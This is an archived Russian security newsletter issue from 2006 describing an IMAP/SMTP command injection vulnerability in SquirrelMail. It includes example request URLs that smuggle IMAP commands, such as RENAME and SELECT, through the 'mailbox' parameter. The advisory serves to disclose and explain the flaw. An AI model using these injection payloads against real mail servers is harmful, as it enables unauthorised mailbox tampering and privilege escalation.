Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в SquirrelMail. (comp.paper.supuser) : Рассылка : Subscribe.Ru

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в SquirrelMail.

IT-безопасность в быту и не только

Рассылка закрыта

Статистика

Отправляет email-рассылки с помощью сервиса Sendsay

При закрытии подписчики были переданы в рассылку "Безопасность. Статьи, новости, комментарии" на которую и рекомендуем вам подписаться.

Вы можете найти рассылки сходной тематики в Каталоге рассылок.

← Март 2006 →
	1 01.03.2006 07:05:18 11:05:28 16:05:20	2 02.03.2006 07:05:13 11:05:11 12:05:15 16:05:10 17:05:05	3 03.03.2006 07:05:19 11:05:24 17:05:06	4	5
6	7 07.03.2006 07:07:52 12:05:11 17:05:05	8	9 09.03.2006 07:05:32 12:05:26	10 10.03.2006 07:05:14 12:05:15 17:05:08	11	12
13	14	15 15.03.2006 07:05:20 12:05:21 17:05:08	16 16.03.2006 07:05:11 12:05:09 17:05:09	17	18	19
20	21	22	23	24	25	26
27	28	29 29.03.2006 07:05:13 17:05:23	30	31

Автор

Forester

1.394 подписчиков
-1 за неделю

← Все выпуски →

← Март 2006 →

1 01.03.2006 07:05:18 11:05:28 16:05:20

2 02.03.2006 07:05:13 11:05:11 12:05:15 16:05:10 17:05:05

3 03.03.2006 07:05:19 11:05:24 17:05:06

7 07.03.2006 07:07:52 12:05:11 17:05:05

9 09.03.2006 07:05:32 12:05:26

10 10.03.2006 07:05:14 12:05:15 17:05:08

15 15.03.2006 07:05:20 12:05:21 17:05:08

16 16.03.2006 07:05:11 12:05:09 17:05:09

29 29.03.2006 07:05:13 17:05:23

Компьютер для продвинутых пользователей

Содержание:

SquirrelMail

ПО: SquirrelMail
Версия: -

О софте:
SquirrelMail стандартно укомплектованный webmail пакет написанный на PHP4. Содержит внутри поддержку IMAP и SMTP протоколов и все страницы написаны на HTML 4.0 для максимальной совместимости со всеми браузерами. Продукт имеет очень малые требования и очень легок в настройке и установке. SquirrelMail содержит все что вы ждете от почтового клиента, встроенная поддержка MIME, адресная книга и возможность управления папками.
http://www.squirrelmail.org
Уязвимость:
SquirrelMail работает с почтовым сервером через интерактивный графический интерфейс используя IMAP и SMTP протоколы. Правильность ввода команд и информации проходит проверку в течении использовании приложения. Так атакующий может вводить произвольные команды IMAP/SMTP серверов в письмо. Это очень опасно из-за возможности инъекции с помощью команд, позволяющих атакующему поднять свои привилегии и использовать уязвимости, которые существуют на сервере с помощью команд.
Использоваине:
== IMAP пример (версия 1.4.2) =============
SquirrelMail уязвимый параметр: "mailbox"
Когда пользователь кликает на поле "Тема" письма, то создается запрос:
http:///src/read_body.php?mailbox=INBOX&passed_id=1&startMessage=1&show_more=0
Атакующих может изменить параметр "mailbox" и вставить любую IMAP команду:
http:///src/read_body.php?mailbox=INBOX%22%0D%0%0D%0A%20SELECT%20%22INBOX&passed_id=

&startMessage=1

Пример:

http:///src/read_body.php?mailbox=INBOX%22%0D%0AZ900%20RENAME%20Trash%20Basura%0d%0aZ910%20SELECT%20%22INBOX&passed_id=22197&startMessage=1

SquirrelMail

Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

В избранное